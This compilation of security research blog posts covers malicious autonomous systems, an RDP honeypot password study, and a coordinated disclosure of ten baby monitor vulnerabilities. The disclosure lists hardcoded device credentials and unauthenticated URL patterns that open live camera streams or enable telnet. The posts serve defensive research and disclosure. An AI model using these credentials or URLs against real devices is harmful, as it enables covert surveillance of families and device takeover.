We have recently focused our research on how these tools can work together to provide unique insight on the state of the internet. Looking at the internet as a whole can help researchers identify stable, macro level trends in the individual attacks between IP addresses. In this post, we’ll give you window into these explorations.

 

IPv4 Topology

First, a quick primer on IPv4, the fourth version of the Internet Protocol. The topology of IPv4 is characterized by three levels of hierarchy, from smallest to largest: IP addresses, subnets, and autonomous systems (ASes). IP addresses on IPv4 are 32-bit sequences that identify hosts or network interfaces. Subnets are groups of IP addresses, and ASes are blocks of subnets managed by public institutions and private enterprises. IPv4 is divided into about 65,000 ASes, at least 30M subnets, and 232 IP addresses.

 

Malicious ASes

There has been a great deal of academic and industry focus on identifying malicious activity in-and-across autonomous systems3,4,5,6, and for good reasons. Well over 50% of “good” internet traffic comes from a small subset of large, well-defined ocean-like ASes pushing content from Netflix, Google, Facebook, Apple and Amazon. Despite this centralization “cloud” content, we’ll show that the internet has become substantially more fragmented over time, enabling those with malicious intent to stake their claim in less friendly waters. In fact, our longitudinal data on phishing activity across IPv4 presented an interesting trend: a small subset of autonomous systems have regularly hosted a disproportionate amount of malicious activity. In particular, 200 ASes hosted 70% of phishing activity from 2007 to 2015 (data: cleanmx archives7). We wanted to understand what makes some autonomous systems more likely to host malicious activity.

 

overall_density-1.png

top_20-1.png

 

IPv4 Fragmentation

We gathered historical data on the mapping between IP addresses and ASes from 2007 to 2015 to generate a longitudinal map of IPv4. This map clearly suggested IPv4 has been fragmenting. In fact, the total number of ASes has grown 60% in the past decade. During the same period, there has been a rise in the number of small ASes and a decline in the number of large ones. These results make sense given that IPV4 address space has been exhausted. This means that growth in IPv4 access requires the reallocation of existing address space into smaller and smaller independent blocks.

 

RStudioScreenSnapz024.png

 

 

AS Fragmentation

Digging deeper into the Internet hierarchy, we analyzed the composition, size, and fragmentation of malicious ASes.

ARIN, one of the primary registrars of ASes, categorizes subnets based on the number of IP addresses they contain. We found that the smallest subnets available made up on average 56±3.0 percent of a malicious AS.

We inferred the the size of an AS by calculating its maximum amount of addressable space. Malicious ASes were in the 80-90th percentile in size across IPv4.

 

To compute fragmentation, subnets observed in ASes overtime were organized into trees based on parent-child relationships (Figure 3). We then calculated the ratio of the number of root subnets, which have no parents, to the number of subsequent child subnets across the lifetime of the AS. We found that malicious ASes were 10-20% more fragmented than other ASes in IPv4.

 

RStudioScreenSnapz024.png

 

These results suggest that malicious ASes are large and deeply fragmented into small subnets. ARIN fee schedules8 showed that smaller subnets are significantly less expensive to purchase; and, the inexpensive nature of small subnets may allow malicious registrars to purchase many IP blocks for traffic redirection or host proxy servers to better float under the radar.

 

 

Future Work

Further work is required to characterize the exact cost structure of buying subnets, registering IP blocks, and setting up infrastructure in malicious ASes.

 

We'd also like to understand the network and system characteristics that cause attackers to choose to co-opt a specific autonomous system over another. For example, we used Sonar’s historical forwardDNS service and our phishing detection algorithms to characterize all domains that have mapped to these ASes in the past two years. Domains hosted in malicious ASes had features that suggested deliberate use of specific infrastructure. For example, 'wordpress' sites were over-represented in some malicious ASes (like (like AS4808), and GoDaddy was by far the most popular registrar for malicious sites across the board.

 

We can also use our SSL Certificate classifier to understand the distribution of devices hosted in ASes across IPv4, as seen in the chart below:

 

overall_device_density-1.png

 

Each square above shows the probability distribution (a fancier, prettier histogram) of device counts of a particular type. Most ASes host fewer than 100 devices across a majority of categories. Are there skews in the presence of specific devices to propagate phishing attacks from these malicious ASes?

 

Conclusion

Our research presents the following results:

 

  1. A small subset of ASes continue to host a disproportionate amount of malicious activity.

  2. Smaller subnets and ASes are becoming more ubiquitous in IPv4.

  3. Malicious ASes are deeply fragmented

  4. There is a concentrated use of specific infrastructure in malicious ASes

  5. Attackers both co-opt existing devices and stand up their own infrastructure within ASes (a gut-check would suggest this is obvious, but having data to back it up also makes it science).

 

Further work is required to characterize the exact cost structure of buying subnets, registering IP blocks, and setting up infrastructure in malicious ASes along with what network and system characteristics cause attackers to choose to co-opt one device in one autonomous system over another.

 

This research represents an example of how Internet-scale data science can provide valuable insight on the threat landscape. We hope similar macro level research is inspired by these explorations and will be bringing you more insights from Project Sonar & Heisenberg over the coming year.


  1. Sonar intro

  2. Heisenberg intro

  3. G. C. M. Moura, R. Sadre and A. Pras, _Internet Bad Neighborhoods: The spam case,“_ Network and Service Management (CNSM), 2011 7th International Conference on, Paris, 2011, pp. 1-8.

  4. B. Stone-Gross, C. Kruegel, K. Almeroth, A. Moser and E. Kirda, “FIRE: FInding Rogue nEtworks”; doi: 10.1109/ACSAC.2009.29

  5. C. A. Shue, A. J. Kalafut and M. Gupta, “Abnormally Malicious Autonomous Systems and Their Internet Connectivity,”; doi: 10.1109/TNET.2011.2157699

  6. A. J. Kalafut, C. A. Shue and M. Gupta, “Malicious Hubs: Detecting Abnormally Malicious Autonomous Systems,”; doi: 10.1109/INFCOM.2010.5462220

  7. Cleanmx archive

  8. ARIN Fee Schedule

royhodgman

The Attacker's Dictionary

Posted by royhodgman Employee Mar 1, 2016

Rapid7 is publishing a report about the passwords attackers use when they scan the internet indiscriminately. You can pick up a copy at booth #4215 at the RSA Conference this week, or online right here. The following post describes some of what is investigated in the report.

 

Announcing the Attacker's Dictionary

Rapid7's Project Sonar periodically scans the internet across a variety of ports and protocols, allowing us to study the global exposure to common vulnerabilities as well as trends in software deployment (this analysis of binary executables stems from Project Sonar).

 

As a complement to Project Sonar, we run another project called Heisenberg which listens for scanning activity. Whereas Project Sonar sends out lots of packets to discover what is running on devices connected to the Internet, Project Heisenberg listens for and records the packets being sent by Project Sonar and other Internet-wide scanning projects.

 

The datasets collected by Project Heisenberg let us study what other people are trying to examine or exploit. Of particular interest are scanning projects which attempt to use credentials to log into services that we do not provide. We cannot say for sure what the intention is of a device attempting to log into a nonexistent RDP server running on an IP address which has never advertised its presence, but we believe that behavior is suspect and worth analyzing.

 

How Project Heisenberg Works

Project Heisenberg is a collection of low interaction honeypots deployed around the world. The honeypots run on IP addresses which we have not published, and we expect that the only traffic directed to the honeypots would come from projects or services scanning a wide range of IP addresses. When an unsolicited connection attempt is made to one of our honeypots, we store all the data sent to the honeypot in a central location for further analysis.

 

In this post we will explore some of the data we have collected related to Remote Desktop Prodocol (RDP) login attempts.

 

RDP Summary Data

We have collected RDP passwords over a 334 day period, from 2015-03-12 to 2016-02-09.

 

During that time we have recorded 221203 different attempts to log in, coming from 5076 distinct IP addresses across 119 different countries, using 1806 different usernames and 3969 different passwords.

 

Because it wouldn't be a discussion of passwords without a top 10 list, the top 10 passwords that we collected are:

 

password

count

percent

x

11865

5.36%

Zz

10591

4.79%

St@rt123

8014

3.62%

1

5679

2.57%

P@ssw0rd

5630

2.55%

bl4ck4ndwhite

5128

2.32%

admin

4810

2.17%

alex

4032

1.82%

.......

2672

1.21%

administrator

2243

1.01%

 

And because we have information not only about passwords, but also about the usernames that are being used, here are the top 10 that were collected:

 

username

count

percent

administrator

77125

34.87%

Administrator

53427

24.15%

user1

8575

3.88%

admin

4935

2.23%

alex

4051

1.83%

pos

2321

1.05%

demo

1920

0.87%

db2admin

1654

0.75%

Admin

1378

0.62%

sql

1354

0.61%

 

We see on average 662.28 login attempts every day, but the actual daily number varies quite a bit. The chart below shows the number of events per day since we started collecting data. Notice the heavy activity in the first four months, which skews the average high.

 

all_events_by_day.png

 

In addition to the username and password being used in the login attempts that we captured, we also collected the IP address of the device making the login attempt. To the best of the ability of the GeoIP database we used, here are the top 15 countries from which the collected login attempts originate:

 

country

country code

count

percent

China

CN

88227

39.89%

United States

US

54977

24.85%

South Korea

KR

13182

5.96%

Netherlands

NL

10808

4.89%

Vietnam

VN

6565

2.97%

United Kingdom

GB

3983

1.80%

Taiwan

TW

3808

1.72%

France

FR

3709

1.68%

Germany

DE

2488

1.12%

Canada

CA

2349

1.06%

 

With the data broken down by country, we can recreate the chart above to show activity by country for the top 5 countries:

 

 

events_per_day_by_country.png

 

RDP Highlights

There is even more information to be found in this data beyond counting passwords, usernames and countries.

We guess that these passwords are selected because whomever is conducting these scans believes that there is a chance they will work. Maybe the scanners have inside knowledge about actual usernames and passwords in use, or maybe they're just using passwords that have been made available from previous security breaches in which account credentials were leaked.

 

In order to look into this, we compared all the passwords collected by Project Heisenberg to passwords listed in two different collections of leaked passwords. The first is a list of passwords collected from leaked password databases by Crackstation. The second list comes from Mark Burnett.

 

In the table below we list how many of the top N passwords are found in these password lists:

 

top password count

num in any list

percent

1

1

100.00%

2

2

100.00%

3

2

66.67%

4

3

75.00%

5

4

80.00%

10

8

80.00%

50

28

56.00%

100

55

55.00%

1000

430

43.00%

3969

1782

44.90%

 

This means that 8 of the 10 most frequently used passwords were also found in published lists of leaked passwords. But looking back at the top 10 passwords above, they are not very complex and so it is not surprising that they appear in a list of leaked passwords.

 

This observation prompted us to look at the complexity of the passwords we collected. Just about any time you sign up for a service on the internet – be it a social networking site, an online bank, or a music streaming service – you will be asked to provide a username and password. Many times your chosen password will be evaluated during the signup process and you will be given feedback about how suitable or secure it is.

 

 

Password evaluation is a tricky and inexact art that consists of various components. Some of the many aspects that a password evaluator may take into consideration include:

 

  • length
  • presence of dictionary words
  • runs of characters (aaabbbcddddd)
  • presence of non alphanumeric characters (!@#$%^&*)
  • common substitutions (1 for l [lowercase L], 0 for O [uppercase o])

 

Different password evaluators will place different values on each of these (and other) characteristics to decide whether a password is "good" or "strong" or "secure". We looked at a few of these password evaluators, and found zxcvbn to be well documented and maintained, so we ran all the passwords through it to compute a complexity score for each one. We then looked at how password complexity is related to finding a password in a list of leaked passwords.

 

complexity

# passwords

%

crackstation

crackstation %

Burnnet

Burnett %

any

any %

all

all %

0

803

20.23

726

90.41

564

70.24

728

90.66

562

69.99

1

1512

38.10

898

59.39

634

41.93

939

62.10

593

39.22

2

735

18.52

87

11.84

37

5.03

94

12.79

30

4.08

3

567

14.29

13

2.29

5

0.88

13

2.29

5

0.88

4

352

8.87

7

1.99

4

1.14

8

2.27

3

0.85

 

The above table shows the complexity of the collected passwords, as well as how many were found in different password lists.

 

For instance, with complexity level 4, there were 352 passwords classified as being that complex, 7 of which were found in the crackstation list, and 4 of which were found in the Burnett list. Furthermore, 8 of the passwords were found in at least one of the password lists, meaning that if you had all the password lists, you would find 2.27% of the passwords classified as having a complexity value of 4. Similarly, looking across all the password lists, you would find 3 (0.85%) passwords present in each of the lists.

 

From this we extrapolate that as passwords get more complex, fewer and fewer are found in the lists of leaked passwords. Since we see that attackers try passwords that are stupendously simple, like single character passwords, and much more complex passwords that are typically not found in the usual password lists, we can surmise that these attackers are not tied to these lists in any practical way -- they clearly have other sources for likely credentials to try.

 

Finally, we wanted to know what the population of possible targets looks like. How many endpoints on the internet have an RDP server running, waiting for connections? Since we have experience from Project Sonar, on 2016-02-02 the Rapid7 Labs team ran a Sonar scan to see how many IPs have port 3389 open listening for tcp traffic. We found that 10822679 different IP addresses meet that criteria, spread out all over the world.

 

So What?

With this dataset we can learn about how people looking to log into RDP servers operate. We have much more detail in the report, but some our findings include:

  • We see that many times a day, every day, our honeypots are contacted by a variety of entities.
  • We see that many of these entities try to log into an RDP service which is not there, using a variety of credentials.
  • We see that a majority of the login attempts use simple passwords, most of which are present in collections of leaked passwords.
  • We see that as passwords get more complex, they are less and less likely to be present in collections of leaked passwords.
  • We see that there is a significant population of RDP enabled endpoints connected to the internet.

 

But wait, there's more!

If this interests you and you would like to learn more, come talk to us at booth #4215 the RSA Conference.

By now, you’ve probably caught wind of Mark Stanislav’s ten newly disclosed vulnerabilities last week, or seen our whitepaper on baby monitor security – if not, head on over to the IoTSec resources page.

 

You may also have noticed that Rapid7 isn’t really a Consumer Reports-style testing house for consumer gear. We’re much more of an enterprise security services and products company, so what’s the deal with the baby monitors? Why spend time and effort on this?

 

The Decline of Human Dominance

Well, this whole “Internet of Things” is in the midst of really taking off, which I’m sure doesn’t come as news. According to Gartner, we’re on track to see 25 billion-with-a-B of these Things operating in just five years, or something around three to four Things for every human on Earth.

 

Pretty much every electronic appliance in your home is getting a network stack, an operating system kernel, and a cloud-backed service, and it’s not like they have their own network full of routers and endpoints and frequencies to do all this on. They’re using the home’s WiFi network, hopping out to the Internet, and talking to you via your most convenient screen.

 

Pwned From Home

In the meantime, telecommuting increasingly blurs the lines between the “work” network and the “home” network. From my home WiFi, I check my work e-mail, hop on video conferences, commit code to GitHub (both public and private), and interact with Rapid7’s assets directly or via a cloud service pretty much every day. I know I’m not alone on this. The imaginary line between the “internal” corporate network and the “external” network has been a convenient fiction for a while, and it’s getting more and more porous as traversing that boundary makes more and more business sense. After all, I’m crazy productive when I’m not in the office, thanks largely to my trusty 2FA, SSO, and VPN.

 

So, we’re looking at a situation where you have a network full of Things that haven’t been IT-approved (as if that stopped anyone before) all chattering away, while we’re trying to do sensitive stuff like access and write sensitive and proprietary company data, on the very same network.

 

Oh, and if the aftermarket testing we’ve seen (and performed) is to be believed, these devices haven’t had a whole lot of security rigor applied.

 

Compromising a network starts with knocking over that low-hanging fruit, that one device that hasn’t seen a patch in forever, that doesn’t keep logs, that has a silly password on an administrator-level account – pretty much, a device that has all of the classic misfeatures common to video baby monitors and every other early market IoT device.

 

Let’s Get Hacking

Independent research is critical in getting the point across that this IoT revolution is not just nifty and useful. It needs to be handled with care. Otherwise, the IoT space will represent a mountain of shells, pre-built vulnerable platforms, usable by bad guys to get footholds in every home and office network on Earth.

 

If you’re responsible for IT security, maybe it’s time to take a survey of your user base and see if you can get a feel for how many IoT devices are one hop away from your critical assets. Perhaps you can start an education program on password management that goes beyond the local Active Directory, and gets people to take all these passwords seriously. Heck, teach your users how to check and change defaults on their new gadgets, and how to document their changes for when things go south.

 

In the meantime, check out our webinar tomorrow for the technical details of Mark’s research on video baby monitors, and join us over on Reddit and “Ask Me Anything” about IoT security and what we can do to get ahead of these problems.

Usually, these disclosure notices contain one, maybe two vulnerabilities on one product. Not so for this one; we’ve got ten new vulnerabilities to disclose today.

 

If you were out at DEF CON 23, you may have caught Mark Stanislav’s workshop, “The Hand that Rocks the Cradle: Hacking IoT Baby Monitors.” You may have also noticed some light redaction in the slides, since during the course of that research, Mark uncovered a number of new vulnerabilities across several video baby monitors.

 

Vendors were notified, CERT/CC was contacted, and CVEs have all been assigned, per the usual disclosure policy, which brings us to the public disclosure piece, here.

 

For more background and details on the IoT research we've performed here at Rapid7, we've put together a collection of resources on this IoT security research. There, you can find the whitepaper covering many more aspects of IoT security, some frequently asked questions around the research, and a registration link for next week's live webinar with Mark Stanislav and Tod Beardsley.

 

Summary

 

CVE-2015-2886

Remote

R7-2015-11.1

Predictable Information Leak

iBaby M6

CVE-2015-2887

Local Net, Device

R7-2015-11.2

Backdoor Credentials

iBaby M3S

CVE-2015-2882

Local Net, Device

R7-2015-12.1

Backdoor Credentials

Philips In.Sight B120/37

CVE-2015-2883

Remote

R7-2015-12.2

Reflective, Stored XSS

Philips In.Sight B120/37

CVE-2015-2884

Remote

R7-2015-12.3

Direct Browsing

Philips In.Sight B120/37

CVE-2015-2888

Remote

R7-2015-13.1

Authentication Bypass

Summer Baby Zoom Wifi Monitor & Internet Viewing System

CVE-2015-2889

Remote

R7-2015-13.2

Privilege Escalation

Summer Baby Zoom Wifi Monitor & Internet Viewing System

CVE-2015-2885

Local Net, Device

R7-2015-14

Backdoor Credentials

Lens Peek-a-View

CVE-2015-2881

Local Net

R7-2015-15

Backdoor Credentials

Gynoii

CVE-2015-2880

Device

R7-2015-16

Backdoor Credentials

TRENDnet WiFi Baby Cam TV-IP743SIC

 

 

Disclosure Details

 

Vendor: iBaby Labs, Inc.

maxresdefault.jpgThe issues for the iBaby devices were disclosed to CERT under vulnerability note VU#745448.

 

Device: iBaby M6

The vendor's product site for the device assessed is https://ibabylabs.com/ibaby-monitor-m6


Vulnerability R7-2015-11.1: Predictable public information leak (CVE-2015-2886)

The web site ibabycloud.com has a vulnerability by which any authenticated user to the ibabycloud.com service is able to view camera details for any other user, including video recording details, due to a direct object reference vulnerability.

 

The object ID parameter is eight hexadecimal characters, corresponding with the serial number for the device. This small object ID space enables a trivial enumeration attack, where attackers can quickly brute force the object IDs of all cameras.

 

Once an attacker is able to view an account's details, broken links provide a filename that is intended to show available "alert" videos that the camera recorded. Using a generic AWS CloudFront endpoint found via sniffing iOS app functionality, this URL can have the harvested filename appended and data accessed from the account. This effectively allows anyone to view videos that were created from that camera stored on the ibabycloud.com service, until those videos are deleted, without any further authentication.

 

Relevant URLs

 

Additional Details

The ibabycloud.com authentication procedure has been non-functional as of at least June, 2015, continuing through the publication of this paper in September, 2015. These errors started after testing was conducted for this research, and today, do not allow for logins to the cloud service. That noted, it may be possible to still get a valid session via the API and subsequently leverage the site and API to gain these details.

 

Mitigations

Today, this attack is more difficult without prior knowledge of the camera's serial number, as all logins are disabled on the ibabycloud.com website. Attackers must, therefore, acquire specific object IDs by other means, such as sniffing local network traffic.

 

In order to avoid local network traffic cleartext exposure, customers should inquire with the vendor about a firmware update, or cease using the device.

 

 

Device: iBaby M3S

m3-product_0_0.jpgThe vendor's product site for the device assessed is https://ibabylabs.com/ibaby-monitor-m3s

 

Vulnerability R7-2015-11.2, Backdoor Credentials (CVE-2015-2887)

The device ships with hardcoded credentials, accessible from a telnet login prompt and a UART interface, which grants access to the underlying operating system. Those credentials are detailed below.

 

Operating System (via Telnet or UART)

  • Username: admin
  • Password: admin

 

Mitigations

In order to disable these credentials, customers should inquire with the vendor about a firmware update. UART access can be limited by not allowing untrusted parties physical access to the device. A vendor-provided patch should disable local administrative logins, and in the meantime, end-users should secure the device’s housing with tamper-evident labels.

 

Disclosure Timeline

Sat, Jul 04, 2015: Initial contact to vendor

Mon, Jul 06, 2015: Vendor reply, requesting details for ticket #4085

Tue, Jul 07, 2015: Disclosure to vendor

Tue, Jul 21, 2015: Disclosure to CERT

Fri, Jul 24, 2015: Confirmed receipt by CERT

Wed, Sep 02, 2015: Public disclosure

 

 

Vendor: Philips Electronics N.V.

B120_37-IMS-en_US?wid=1250&$jpglarge$The issue for the Philips device was disclosed to CERT under vulnerability note VU#569536.

 

Device: Philips In.Sight B120/37

The vendor's product site for the device assessed is http://www.usa.philips.com/c-p/B120_37/in.sight-wireless-hd-baby-monitor

 

Vulnerability R7-2015-12.1, Backdoor Credentials (CVE-2015-2882)

The device ships with hardcoded and statically generated credentials which can grant access to both the local web server and operating system.

The operating system "admin" and "mg3500" account passwords are present due to the stock firmware used by this camera, which is used by other cameras on the market today.

The web service "admin" statically-generated password was first documented by Paul Price at his blog[1].

In addition, while the telnet service may be disabled by default on the most recent firmware, it can be re-enabled via an issue detailed below.

 

Operating System (via Telnet or UART)

  • Username: root
  • Password: b120root

 

Operating System (via Telnet or UART)

  • Username: admin
  • Password: /ADMIN/

 

Operating System (via Telnet or UART)

  • Username: mg3500
  • Password: merlin

 

Local Web Server

Reachable via http://{device_ip}/cgi-bin/{script_path}

  • Username: user
  • Password: M100-4674448

 

Local Web Server

Reachable via http://{device_ip}/cgi-bin/{script_path}

  • Username: admin
  • Password: M100-4674448
  • A recent update changes this password, but the new password is simply the letter 'i' prefixing the first ten characters of the MD5 hash of the device's MAC address.

 

Vulnerability R7-2015-12.2, Reflective and Stored XSS (CVE-2015-2883)

A web service used on the backend of Philips' cloud service to create remote streaming sessions is vulnerable to reflective and stored XSS. Subsequently, session hijacking is possible due to a lack of an HttpOnly flag.

When accessing the Weaved cloud web service[2] as an authenticated user, multiple pages have a mixture of reflective and stored XSS in them, allowing for potential session hijacking. With this access, a valid streaming session could be generated and eavesdropped upon by an attacker. Two such examples are:

 

Vulnerability R7-2015-12.3, Direct Browsing via Insecure Streaming (CVE-2015-2884)

The method for allowing remote viewing uses an insecure transport, does not offer secure streams protected from attackers, and does not offer sufficient protection for the the camera's internal web applications.

Once a remote viewing stream has been requested, a proxy connection to the camera's internal web service via the cloud provider Yoics[3] is bound to a public hostname and port number. These port numbers appear to range from port 32,000 to 39,000 as determined from testing.This bound port is tied to a hostname with the pattern of proxy[1,3-14].yoics.net, limiting the potential number of port and host combinations to an enumerable level. Given this manageable attack space, attackers can test for for a HTTP 200 response in a reasonably short amount of time.

 

Once found, administrative privilege is available without authentication of any kind to the web scripts available on the device. Further, by accessing a Unicode-enabled streaming URL (known as an "m3u8" URL), a live video/audio stream will be accessible to the camera and appears to stay open for up to 1 hour on that host/port combination. There is no blacklist or whitelist restriction on which IP addresses can access these URLs, as revealed in testing.

 

Relevant URLs

  • Open audio/video stream of a camera: http://proxy{1,3-14}.yoics.net:{32000-39000}/tmp/stream2/stream.m3u8 [no authentication required]
  • Enable Telnet service on camera remotely: http://proxy{1,3-14}.yoics.net:{32000-39000}/cgi-bin/cam_service_enable.cgi [no authentication required]

 

Mitigations

In order to disable the hard-coded credentials, customers should inquire with the vendor about a firmware update. UART access can be limited by not allowing untrusted parties physical access to the device. A vendor-provided patch should disable local administrative logins, and in the meantime, end-users should secure the device’s housing with tamper-evident labels. In order to avoid the XSS and cleartext streaming issues with Philips' cloud service, customers should avoid using the remote streaming functionality of the device and inquire with the vendor about the status of a cloud service update.

 

Additional Information

Prior to publication of this report, Philips confirmed with Rapid7 the tested device was discontinued by Philips in 2013, and the current manufacturer and distributor is Gibson Innovations. Gibson has developed a solution for the identified vulnerabilities, an expects to make updates available by September 4, 2015.

 

Disclosure Timeline

Sat, Jul 04, 2015: Initial contact to vendor

Mon, Jul 06, 2015: Vendor reply, requesting details

Tue, Jul 07, 2015: Philips Responsible Disclosure ticket number 15191319 assigned

Tue, Jul 17, 2015: Phone conference with vendor to discuss issues

Tue, Jul 21, 2015: Disclosure to CERT

Fri, Jul 24, 2015: Confirmed receipt by CERT

Thu, Aug 27, 2015: Contacted by Weaved to validate R7-2015-12.2

Tue, Sep 01, 2015: Contacted by Philips regarding the role of Gibson Innovations

Wed, Sep 02, 2015: Public disclosure

 

 

Vendor: Summer Infant

71z07dgKAiL._SX450_.jpgThe issues for the Summer Infant device was disclosed to CERT under vulnerability note VU#837936.

 

Device: Summer Baby Zoom WiFi Monitor & Internet Viewing System

The vendor's product site for the device assessed is http://www.summerinfant.com/monitoring/internet/babyzoomwifi.

 

Vulnerability R7-2015-13.1, Authentication Bypass (CVE-2015-2888)

An authentication bypass allows for the addition of an arbitrary account to any camera, without authentication.

The web service MySnapCam[4] is used to support the camera's functionality, including account management for access. A URL retrievable via an HTTP GET request can be used to add a new user to the camera. This URL does not require any of the camera's administrators to have a valid session to execute this request, allowing anyone requesting the URL with their details against any camera ID to have access added to that device.

After a new user is successfully added, an e-mail will then be sent to an e-mail address provided by the attacker with authentication details for the MySnapCam web site and mobile application. Camera administrators are not notified of the new account.

 

Relevant URL

 

Vulnerability R7-2015-13.2, Privilege Escalation (CVE-2015-2889)

An authenticated, regular user can access an administrative interface that fails to check for privileges, leading to privilege escalation.

 

A "Settings" interface exists for the camera's cloud service administrative user and appears as a link in their interface when they login. If a non-administrative user is logged in to that camera and manually enters that URL, they are able to see the same administrative actions and carry them out as if they had administrative privilege. This allows an unprivileged user to elevate account privileges arbitrarily.

 

Relevant URL

 

Mitigations

In order to avoid exposure to the authentication bypass and privilege escalation, customers should use the device in a local network only mode, and use egress firewall rules to block the camera from the Internet. If Internet access is desired, customers should inquire about an update to Summer Infant's cloud services.

 

Disclosure Timeline

Sat, Jul 04, 2015: Initial contact to vendor

Tue, Jul 21, 2015: Disclosure to CERT

Fri, Jul 24, 2015: Confirmed receipt by CERT

Tue, Sep 01, 2015: Confirmed receipt by vendor

Wed, Sep 02, 2015: Public disclosure

 

 

Vendor: Lens Laboratories(f)

71yIyoKGwBL._SY355_.jpgThe issues for the Lens Laboratories(f) device was disclosed to CERT under vulnerability note VU#931216.

 

Device: Lens Peek-a-View

The vendor's product site for the device assessed is http://www.amazon.com/Peek---view-Resolution-Wireless-Monitor/dp/B00N5AVMQI/

 

Of special note, it has proven difficult to find a registered domain for this vendor. All references to the vendor point at Amazon directly, but Amazon does not appear to be the manufacturer or vendor.

 

Vulnerability R7-2015-14, Backdoor Credentials (CVE-2015-2885)

The device ships with hardcoded credentials, accessible from a UART interface, which grants access to the underlying operating system, and via the local web service, giving local application access via the web UI.

Due to weak filesystem permissions, the local OS ‘admin’ account has effective ‘root’ privileges.

 

Operating System (via UART)

  • Username: admin
  • Password: 2601hx

 

Local Web Server

Site: http://{device_ip}/web/

  • Username: user
  • Password: user

 

Local Web Server

Site: via http://{device_ip}/web/

  • Username: guest
  • Password: guest

 

Mitigations

In order to disable these credentials, customers should inquire with the vendor about a firmware update. UART access can be limited by not allowing untrusted parties physical access to the device. A vendor-provided patch should disable local administrative logins, and in the meantime, end-users should secure the device’s housing with tamper-evident labels.

 

Disclosure Timeline

Sat, Jul 04, 2015: Attempted to find vendor contact

Tue, Jul 21, 2015: Disclosure to CERT

Fri, Jul 24, 2015: Confirmed receipt by CERT

Wed, Sep 02, 2015: Public disclosure

 

 

Vendor: Gynoii, Inc.

71yIyoKGwBL._SY355_.jpgThe issues for the Gynoii devices was disclosed to CERT under vulnerability note VU#738848.

 

Device: Gynoii

The vendor's product site for the device assessed is http://www.gynoii.com/product.html

 

Vulnerability R7-2015-15, Backdoor Credentials (CVE-2015-2881)

The device ships with hardcoded credentials, accessible via the local web service, giving local application access via the web UI.

 

Local Web Server

Site: http://{device_ip}/admin/

  • Username: guest
  • Password: guest

 

Local Web Server

Site: http://{device_ip}/admin/

  • Username: admin
  • Password: 12345

 

Mitigations

In order to disable these credentials, customers should inquire with the vendor about a firmware update.

 

Disclosure Timeline

Sat, Jul 04, 2015: Initial contact to vendor

Tue, Jul 21, 2015: Disclosure to CERT

Fri, Jul 24, 2015: Confirmed receipt by CERT

Wed, Sep 02, 2015: Public disclosure

 

 

Vendor: TRENDnet

trendnet_tv_ip743sic_wifi_h_264_day_night_ir_1074096.jpgThe issues for the TRENDnet device was disclosed to CERT under vulnerability note VU#136207.

 

Device: TRENDnet WiFi Baby Cam TV-IP743SIC

The vendor's product site for the device under test is http://www.trendnet.com/products/proddetail.asp?prod=235_TV-IP743SIC

 

Vulnerability R7-2015-16: Backdoor Credentials (CVE-2015-2880)

The device ships with hardcoded credentials, accessible via a UART interface, giving local, root-level operating system access.

 

Operating System (via UART)

  • Username: root
  • Password: admin

 

Mitigations

In order to disable these credentials, customers should inquire with the vendor about a firmware update. UART access can be limited by not allowing untrusted parties physical access to the device. A vendor-provided patch should disable local administrative logins, and in the meantime, end-users should secure the device’s housing with tamper-evident labels.

 

Disclosure Timeline

Sat, Jul 04, 2015: Initial contact to vendor

Mon, Jul 06, 2015: Vendor reply, details disclosed to vendor

Sun, Jul 16, 2015: Clarification sought by vendor

Mon, Jul 20, 2015: Clarification provided to vendor

Tue, Jul 21, 2015: Disclosure to CERT

Wed, Sep 02, 2015: Public disclosure

 

 

Not Just Baby Monitors

As you can see, there were several new findings across a range of vendors, all operating in the same space. Here at Rapid7, we believe this is not unique to the video baby monitor industry in particular, but is indicative of a larger, systemic problem with IoT in general. We've put together a collection of IoT resources, including a whitepaper and a FAQ, covering these issues, which should fill you in on where we're at on this IoT security journey. Join us next week for a live webinar where Mark Stanislav and Tod Beardsley will discuss these issues further, or just use the #IotSec hashtag on Twitter to catch our attention with a question or comment.

 

In the meantime, keep an eye on those things keeping an eye on your infants and toddlers.

 

Update (Sep 02, 2015): Gynoii acknowledged the above research shortly after publication and are assessing appropriate patch strategies.

Update (Sep 02, 2015): iBaby Labs communicated that access token expiration and secure communication channels have been implemented.

Update (Sep 02, 2015): Summer Infant tweeted that all reported issues have been resolved.

Update (Sep 03, 2015): TRENDnet reports updated firmware available here (version 1.0.3), released on Sep 02, 2015.

 


[1] http://www.ifc0nfig.com/a-close-look-at-the-philips-in-sight-ip-camera-range/

[2] http://www.weaved.com/

[3] https://www.yoics.net

[4] http://www.mysnapcam.com/

Over the past couple of years I've dove into Internet of Things (IoT) security research and found it to be a rather fun (and sometimes terrifying) mixture of technologies, [in]delicately woven together to provide for some pretty useful, and not so useful, devices. It's a very exciting time right now as technologists navigate the nascent waters to determine what the best-of-breed platforms, protocols, and languages that will drive IoT for years to come will be. We're at the HD-DVD v. Blu-Ray phase in a lot of ways, except there aren't just two players in the space, but thousands of organizations all trying to get their special new technology to be the cornerstone of a revolution.

 

Recently, I was invited to speak for the Plug and Play Tech Center as part of my mentorship for their Plug and Play Accelerator portfolio companies. In my presentation, I conveyed to the very people who are creating the newest generation of innovation what real-world security research has uncovered for those early participants in IoT. By explaining the security missteps of vendors and guiding the appropriate ways to avoid those mistakes in the future, my hope is that the audience left with actionable guidance to create a more safe and beneficial contribution to this world.

 

In this blog post I'd like to give a high-level sense of what IoT security research often entails. This is definitely not a comprehensive post, as, I'd have to write a book and then get about a dozen co-authors to accomplish that. This post is intended for the casual security researcher, or even IoT vendor, who wants to know what this research looks like, and where to get started. I hope it spurs additional research into this space, because there's plenty of ground to cover.

 

IoT Has Many Avenues... Where to Start?

There's a long-winded excitement to IoT security research because in many cases there are a number of technology components involved, including mobile applications, Bluetooth, Wi-Fi, device firmware, services, APIs, and a variety of network protocols. Each of these has the potential to provide a researcher with new insight into the operation of the device or become a critical foothold to take a next step in the research process. Where you start with research covering this many areas is certainly a personal preference, but I happen to like to begin with the mobile application.

 

Mobile ApplicationsB1tLaDmIcAAIvQR.png

Because a mobile application is often central to the function of many IoT devices, the contents of the application are likely to provide clues about how the device operates and could even leak hardcoded credentials, protocol details, and keys. Since I am an iOS person, I often use Clutch on a jailbroken iPhone to provide me with an unencrypted version of the device's app. Once you have this, simple CLI tools like strings and otool are a good start to get a sense of what the application is up to.

 

Of course, more advanced application analysis is possible with tools like Hopper or IDA, but you'd be terrified what you can find without much trouble in these applications. Also, I highly recommend taking a look at Dan Mayer's awesome tool, idb, which will help streamline your iOS efforts with a nice GUI and integrated tooling to accomplish tasks more easily.

 

